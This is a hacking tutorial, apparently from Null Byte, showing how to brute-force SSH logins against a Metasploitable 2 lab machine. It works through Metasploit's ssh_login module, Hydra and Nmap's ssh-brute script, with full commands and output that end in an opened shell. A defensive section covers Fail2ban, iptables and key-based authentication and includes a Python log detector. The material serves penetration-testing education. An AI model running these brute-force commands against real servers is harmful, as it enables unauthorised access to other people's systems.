
How to Get SSH Access to Servers Through Brute-Forcing Credentials «Null Byte :: WonderHowTo



SSH is one of the most common protocols in modern IT infrastructure and can therefore be an important attack vector for hackers. One of the most reliable ways to get SSH access to a server is to brute-force credentials. There are several ways to perform an SSH brute-force attack, all of which ultimately lead to the identification of valid credentials.

Although these are not the only options, tools such as Metasploit, Hydra, and the Nmap Scripting Engine can all perform this task, and all of them are included in Kali Linux. As for the target, we will practice on Metasploitable 2, a vulnerable test environment for pentesting and security research.

Overview of SSH

SSH (Secure Shell) is a network protocol that allows encrypted communication over an insecure network. It was developed as an alternative to Telnet, which sends information in plain text, a problem especially for passwords.

The SSH cryptographic network protocol uses a client-server model, that is, the client initiates a connection to the server and communication is established after authentication. SSH can use both password authentication and private key authentication, the latter being considered more secure.

Recommended Reading Material: SSH, The Secure Shell: The Definitive Guide

Uses of SSH include provisioning remote access, logins and command execution, file transfers, mobile development, and connectivity troubleshooting in cloud-based applications. Virtually every major corporation implements SSH in one way or another, making it a valuable technology to understand.

Scan with Nmap

Before we begin brute-forcing, we need to check the status of the port SSH is running on. We can do a simple Nmap scan to see whether it is open or not. Instead of scanning all the default ports, you can specify a single port number with the -p flag.

  nmap 172.16.1.102 -p 22

  Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-26 14:58 CST
  Nmap scan report for 172.16.1.102
  Host is up (0.0039s latency).

  PORT   STATE SERVICE
  22/tcp open  ssh
  MAC Address: 08:00:27:77:62:6C (Oracle VirtualBox virtual NIC)

  Nmap done: 1 IP address (1 host up) scanned in 13.33 seconds

We can see above that port 22 is open and the SSH service is running on it. It would be a waste of time to continue if it were closed or not running at all. Now we can start brute-forcing.

Method 1: Metasploit

The first method we will try today is one of Metasploit's auxiliary scanners. First, start the PostgreSQL database with the following command:

  service postgresql start 

Now you can start Metasploit by typing msfconsole in the terminal. You should see an "msf" prompt, but for me it is "msf5" because I am using the latest version, Metasploit 5, which you get by keeping Kali up to date. It is always a good idea to stay current with the latest exploits and tools. Here is the command I use to update:

  apt-get update && apt-get dist-upgrade 

After being greeted by the msfconsole welcome banner, we find the appropriate module with the search command.

  search ssh

  Matching Modules
  ================

     Name                                              Disclosure Date  Rank    Check  Description
     ----                                              ---------------  ----    -----  -----------
     auxiliary/dos/windows/ssh/sysax_sshd_kexchange    2013-03-17       normal  No     Sysax Multi-Server 6.10 SSHD Key Exchange Denial of Service
     auxiliary/fuzzers/ssh/ssh_kexinit_corrupt                          normal  No     SSH Key Exchange Init Corruption
     auxiliary/fuzzers/ssh/ssh_version_15                               normal  No     SSH 1.5 Version Fuzzer
     auxiliary/fuzzers/ssh/ssh_version_2                                normal  No     SSH 2.0 Version Fuzzer
     auxiliary/fuzzers/ssh/ssh_version_corrupt                          normal  No     SSH Version Corruption
     auxiliary/scanner/http/cisco_firepower_login                       normal  Yes    Cisco Firepower Management Console 6.0 Login
     auxiliary/scanner/http/gitlab_user_enum           2014-11-21       normal  Yes    GitLab User Enumeration
     auxiliary/scanner/ssh/apache_karaf_command_execution  2016-02-09   normal  Yes    Apache Karaf Default Credentials Command Execution
     auxiliary/scanner/ssh/cerberus_sftp_enumusers     2014-05-27       normal  Yes    Cerberus FTP Server SFTP Username Enumeration
     auxiliary/scanner/ssh/detect_kippo                                 normal  Yes    Kippo SSH Honeypot Detector
     auxiliary/scanner/ssh/eaton_xpert_backdoor        2018-07-18       normal  Yes    Eaton Xpert Meter SSH Private Key Exposure Scanner
     auxiliary/scanner/ssh/fortinet_backdoor           2016-01-09       normal  Yes    Fortinet SSH Backdoor Scanner
     auxiliary/scanner/ssh/juniper_backdoor            2015-12-20       normal  Yes    Juniper SSH Backdoor Scanner
     auxiliary/scanner/ssh/karaf_login                                  normal  Yes    Apache Karaf Login Utility
     auxiliary/scanner/ssh/libssh_auth_bypass          2018-10-16       normal  Yes    libssh Authentication Bypass Scanner
     auxiliary/scanner/ssh/ssh_enumusers                                normal  Yes    SSH Username Enumeration
     auxiliary/scanner/ssh/ssh_identify_pubkeys                         normal  Yes    SSH Public Key Acceptance Scanner
     auxiliary/scanner/ssh/ssh_login                                    normal  Yes    SSH Login Check Scanner
     auxiliary/scanner/ssh/ssh_login_pubkey                             normal  Yes    SSH Public Key Login Scanner
     auxiliary/scanner/ssh/ssh_version                                  normal  Yes    SSH Version Scanner

  ...

The ssh_login module is exactly what we need. Load it with the use command. After that, the prompt should read "msf5 auxiliary(scanner/ssh/ssh_login) >", letting you know that you are working in the right place.

  use auxiliary/scanner/ssh/ssh_login

Then you can enter options to display the available settings for the scanner.

  options

  Module options (auxiliary/scanner/ssh/ssh_login):

     Name              Current Setting  Required  Description
     ----              ---------------  --------  -----------
     BLANK_PASSWORDS   false            no        Try blank passwords for all users
     BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
     DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
     DB_ALL_PASS       false            no        Add all passwords in the current database to the list
     DB_ALL_USERS      false            no        Add all users in the current database to the list
     PASSWORD                           no        A specific password to authenticate with
     PASS_FILE                          no        File containing passwords, one per line
     RHOSTS                             yes       The target address range or CIDR identifier
     RPORT             22               yes       The target port
     STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
     THREADS           1                yes       The number of concurrent threads
     USERNAME                           no        A specific username to authenticate as
     USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
     USER_AS_PASS      false            no        Try the username as the password for all users
     USER_FILE                          no        File containing usernames, one per line
     VERBOSE           false            yes       Whether to print output for all attempts

We need to set a few options for the module to work properly. RHOSTS is the IP address of our target.

  set rhosts 172.16.1.102
  rhosts => 172.16.1.102

Next, STOP_ON_SUCCESS stops the attack as soon as valid credentials are found.

  set stop_on_success true
  stop_on_success => true

Then USER_FILE is the list of usernames.

  set user_file users.txt
  user_file => users.txt

And PASS_FILE is the list of passwords.

  set pass_file passwords.txt
  pass_file => passwords.txt

Finally, VERBOSE displays all attempts.

  set verbose true
  verbose => true

For the user and password files, I used a shortened list of known default credentials for this demonstration. In a real engagement, you would probably want to use one of the well-known wordlists, or a custom one, to fit your needs.

We should have everything prepared now. Enter run at the prompt to start it:

  run

  [-] 172.16.1.102:22 - Failed: 'user:password'
  [-] 172.16.1.102:22 - Failed: 'user:password123'
  [-] 172.16.1.102:22 - Failed: 'user:msfadmin'
  [-] 172.16.1.102:22 - Failed: 'user:admin'
  [-] 172.16.1.102:22 - Failed: 'user:default'
  [-] 172.16.1.102:22 - Failed: 'user:root'
  [-] 172.16.1.102:22 - Failed: 'user:toor'
  [-] 172.16.1.102:22 - Failed: 'user:hello'
  [-] 172.16.1.102:22 - Failed: 'user:welcome'
  [-] 172.16.1.102:22 - Failed: 'user:hunter2'
  [-] 172.16.1.102:22 - Failed: 'msfadmin:password'
  [-] 172.16.1.102:22 - Failed: 'msfadmin:password123'
  [+] 172.16.1.102:22 - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(backup),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
  [*] Command shell session 1 opened (172.16.1.100:37615 -> 172.16.1.102:22) at 2019-02-26 15:06:58 -0600
  [*] Scanned 1 of 1 hosts (100% complete)
  [*] Auxiliary module execution completed

Since we set the verbose option, we can see all the attempts as they take place. Depending on the number of combinations of username and password, the execution may take some time.

If valid credentials are found, a success message is displayed and a command shell session is opened. However, we are not dropped into it automatically, so we view the currently active sessions with the sessions command.

  sessions

  Active sessions
  ===============

    Id  Name  Type             Information                                  Connection
    --  ----  ----             -----------                                  ----------
    1         shell linux  SSH msfadmin:msfadmin (172.16.1.102:22)  172.16.1.100:37615 -> 172.16.1.102:22 (172.16.1.102)

This shows that it is an SSH connection. To interact with this session, use the -i flag followed by the session ID.

  sessions -i 1

  [*] Starting interaction with 1...

  id
  uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(backup),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)

Now we are connected to the target via SSH and can execute commands as normal.

Method 2: Hydra

The next tool we will use is Hydra, a powerful login cracker that is very fast and supports a number of different protocols. To view the help and some basic usage, just type hydra in the terminal. (Note: if you were previously in the MSF console, make sure you have exited it before using Hydra.)

  hydra

  Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

  Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]]

  Options:
    -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
    -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
    -C FILE   colon separated "login:pass" format, instead of -L/-P options
    -M FILE   list of servers to attack, one entry per line, ':' to specify port
    -t TASKS  run TASKS number of connects in parallel per target (default: 16)
    -U        service module usage details
    -h        more command line options (COMPLETE HELP)
    server    the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
    service   the service to crack (see below for supported protocols)
    OPT       some service modules support additional input (-U for module help)

  Supported services: adam6500 asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

  Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
  v3.0. The newest version is always available at https://github.com/vanhauser-thc/thc-hydra
  Don't use in military or secret service organizations, or for illegal purposes.

  Example:  hydra -l user -P passlist.txt ftp://192.168.0.1

Hydra has a large number of options. Today, however, we will only use:

  • The -L flag, which specifies a list of login names.
  • The -P flag, which specifies a list of passwords.
  • ssh://172.16.1.102, our target and protocol.
  • The -t flag set to 4, which sets the number of parallel tasks.

Once we start it, the tool displays the status of the attack:

  hydra -L users.txt -P passwords.txt ssh://172.16.1.102 -t 4

  Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

  Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-02-26 15:12:47
  [DATA] max 4 tasks per 1 server, overall 4 tasks, 90 login tries (l:9/p:10), ~23 tries per task
  [DATA] attacking ssh://172.16.1.102:22/

After some time it finishes, and the valid logins it found are displayed.

  [22][ssh] host: 172.16.1.102   login: msfadmin   password: msfadmin
  [STATUS] 44.00 tries/min, 44 tries in 00:01h, 46 to do in 00:02h, 4 active
  [STATUS] 42.00 tries/min, 84 tries in 00:02h, 6 to do in 00:01h, 4 active
  1 of 1 target successfully completed, 1 valid password found
  Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-02-26 15:15:10

Hydra's parallel processing makes it a good choice when a large number of potential credentials is involved.

Method 3: Nmap Scripting Engine

The last method of brute-forcing SSH credentials we will try today uses the Nmap Scripting Engine. NSE includes a script that attempts all possible combinations of username and password. To perform this attack, run a simple Nmap scan from a new terminal as before, but with some additional options:

  • --script ssh-brute specifies the script to use.
  • --script-args sets the arguments for the script, separated by commas.
  • userdb=users.txt is the list of usernames we want to use.
  • passdb=passwords.txt is the list of passwords we want to use.

Now we can start the scan:

  nmap 172.16.1.102 -p 22 --script ssh-brute --script-args userdb=users.txt,passdb=passwords.txt

  Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-26 15:17 CST

NSE displays the brute-force attempts and the credentials tried as it goes. Be patient: depending on the number of usernames and passwords used, this can take some time.

  NSE: [ssh-brute] Trying username/password pair: user:user
  NSE: [ssh-brute] Trying username/password pair: msfadmin:msfadmin
  NSE: [ssh-brute] Trying username/password pair: admin:admin
  NSE: [ssh-brute] Trying username/password pair: root:root
  NSE: [ssh-brute] Trying username/password pair: john:john
  NSE: [ssh-brute] Trying username/password pair: default:default
  NSE: [ssh-brute] Trying username/password pair: support:support
  NSE: [ssh-brute] Trying username/password pair: service:service
  NSE: [ssh-brute] Trying username/password pair: adam:adam
  NSE: [ssh-brute] Trying username/password pair: admin:password
  NSE: [ssh-brute] Trying username/password pair: root:password
  NSE: [ssh-brute] Trying username/password pair: john:password
  NSE: [ssh-brute] Trying username/password pair: default:password
  NSE: [ssh-brute] Trying username/password pair: support:password
  NSE: [ssh-brute] Trying username/password pair: adam:password
  NSE: [ssh-brute] Trying username/password pair: admin:password123
  NSE: [ssh-brute] Trying username/password pair: root:password123
  NSE: [ssh-brute] Trying username/password pair: john:password123
  NSE: [ssh-brute] Trying username/password pair: default:password123

  ...

After a while the scan is finished and a report is displayed in the terminal.

  Nmap scan report for 172.16.1.102
  Host is up (0.0011s latency).

  PORT   STATE SERVICE
  22/tcp open  ssh
  | ssh-brute:
  |   Accounts:
  |     user:user - Valid credentials
  |     msfadmin:msfadmin - Valid credentials
  |     service:service - Valid credentials
  |_  Statistics: Performed 66 guesses in 124 seconds, average tps: 0.5
  MAC Address: 08:00:27:77:62:6C (Oracle VirtualBox virtual NIC)

  Nmap done: 1 IP address (1 host up) scanned in 147.59 seconds

Above we can see that three valid credential pairs were found. This script is useful because it tries every possible combination of username and password, which sometimes yields more results than the other tools.

Preventing SSH Brute Forcing

The reality is that if you have a server facing the internet, there will be many SSH brute-force attempts against it every day, most of them automated. But do not worry: there are a few simple measures that protect against them and reduce the number of login attempts.

One of the simplest is to change the port number SSH listens on. Although this deters the most rudimentary brute-force attempts, it is easy to scan for SSH running on an alternate port, so it should not be relied on by itself.

A better method is to use a service such as Fail2ban or DenyHosts, or iptables rules, to block brute-force attempts at the host level. Combined with private key authentication instead of passwords, this will keep out most attackers. If password-based authentication is required, use strong passwords and follow best practices.
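To make the host-level blocking described above concrete, here is an added example (not code from the article, and not Fail2ban's own implementation) that applies Fail2ban's maxretry/findtime idea to sshd log lines: it parses "Failed password" entries from auth.log, keeps a sliding time window of failures per source address, and reports the addresses that should be banned together with the iptables rule a tool like Fail2ban would insert. The log lines are constructed for the demonstration (the year is assumed, since syslog timestamps carry none), and the thresholds are hypothetical defaults.

```python
"""Sliding-window SSH brute-force detector over constructed auth.log lines.

Added example, not the article's code and not Fail2ban itself. It mirrors the
maxretry/findtime logic Fail2ban applies to the sshd filter: count failed
password attempts per source address inside a time window and ban an address
that crosses the threshold.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample lines in OpenSSH/syslog format. One address hammers the
# server within seconds; the other fails twice, 11 minutes apart.
SAMPLE_LOG = """\
Feb 26 15:12:47 metasploitable sshd[2231]: Failed password for invalid user user from 172.16.1.100 port 37610 ssh2
Feb 26 15:12:48 metasploitable sshd[2231]: Failed password for invalid user user from 172.16.1.100 port 37611 ssh2
Feb 26 15:12:49 metasploitable sshd[2233]: Failed password for msfadmin from 172.16.1.100 port 37612 ssh2
Feb 26 15:12:50 metasploitable sshd[2235]: Failed password for msfadmin from 172.16.1.100 port 37613 ssh2
Feb 26 15:12:51 metasploitable sshd[2237]: Failed password for root from 172.16.1.100 port 37614 ssh2
Feb 26 15:12:52 metasploitable sshd[2239]: Accepted password for msfadmin from 172.16.1.100 port 37615 ssh2
Feb 26 15:20:01 metasploitable sshd[2301]: Failed password for alice from 10.0.0.5 port 51000 ssh2
Feb 26 15:31:00 metasploitable sshd[2305]: Failed password for alice from 10.0.0.5 port 51001 ssh2
"""

# Matches the sshd failure line; "invalid user" is present for unknown accounts.
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse_failures(log_text, year=2019):
    """Return a list of (timestamp, ip, user) for every failed password line.

    The year is assumed because syslog timestamps do not include it.
    """
    events = []
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if not m:
            continue  # accepted logins and unrelated lines are ignored
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["ip"], m["user"]))
    return events


def find_offenders(events, maxretry=5, findtime=600):
    """Return {ip: ban_time} for addresses with >= maxretry failures within findtime seconds.

    Each address keeps a deque of recent failure times; entries older than the
    window are dropped before the count is compared with the threshold, so slow
    attempts spread out over a long period do not accumulate into a ban.
    """
    windows = defaultdict(deque)
    banned = {}
    for ts, ip, _user in sorted(events):
        if ip in banned:
            continue  # already handled; a real tool would have dropped its packets
        window = windows[ip]
        window.append(ts)
        while (ts - window[0]).total_seconds() > findtime:
            window.popleft()
        if len(window) >= maxretry:
            banned[ip] = ts
    return banned


def iptables_rule(ip):
    """The host-level block a tool like Fail2ban inserts for a banned address."""
    return f"iptables -I INPUT -s {ip} -p tcp --dport 22 -j DROP"


if __name__ == "__main__":
    offenders = find_offenders(parse_failures(SAMPLE_LOG))
    for ip, when in offenders.items():
        print(f"ban {ip} at {when:%H:%M:%S}: {iptables_rule(ip)}")
```

Run as is, the script bans 172.16.1.100 on its fifth failure at 15:12:51 and leaves 10.0.0.5 alone, because its two failures fall outside the 600-second window. Pair this kind of blocking with the key-only authentication the paragraph above recommends by setting PasswordAuthentication no and PubkeyAuthentication yes in sshd_config, which removes the password guessing surface entirely.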

Summary

In this guide, we learned about SSH and how to brute-force credentials to gain access to a target. First, we covered how to identify an open SSH port. Then we learned to perform a brute-force attack using three methods: Metasploit, Hydra, and the Nmap Scripting Engine. Finally, we worked through some ways to protect against this type of attack.

SSH is a very common protocol, so it's important that every hacker knows how to attack – and how to prevent it.

Cover image by Skitterphoto/Pexels; screenshots by drd_/Null Byte
